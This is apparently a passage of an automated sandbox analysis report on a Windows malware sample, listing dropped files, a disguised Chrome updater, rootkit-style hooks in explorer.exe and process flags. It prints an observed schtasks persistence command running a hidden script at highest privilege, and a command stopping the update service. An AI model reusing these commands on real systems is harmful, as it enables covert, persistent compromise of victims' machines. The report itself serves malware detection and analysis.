            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Update.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\python3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifFile created: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\ucrtbase.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78962\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57242\libcrypto-3.dllJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

            Hooking and other Techniques for Hiding and Protection

            barindex
            Found hidden mapped module (file has been removed from disk)
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NFNGDKPNJKMG.TMP
            Source: C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NFNGDKPNJKMG.TMP
            Hooks files or directories query functions (used to hide files and directories)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Hooks processes query functions (used to hide processes)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_004523FC IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_004523FC
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_003DF64C GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,19_2_003DF64C
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
